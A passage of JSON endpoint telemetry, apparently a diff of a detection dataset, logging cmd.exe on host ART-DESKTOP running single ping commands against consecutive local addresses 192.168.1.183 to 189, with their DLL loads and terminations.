"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "process", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572881990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.183", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6788, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "process", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572886830000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.184", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1748, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "process", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572891830000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.185", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4832, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "process", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572896990000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.186", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1532, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572897130000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897300000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "process", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572901830000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.187", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3068, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "process", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572906830000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.188", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7836, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "process", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572911990000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.189", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3136, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572912130000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 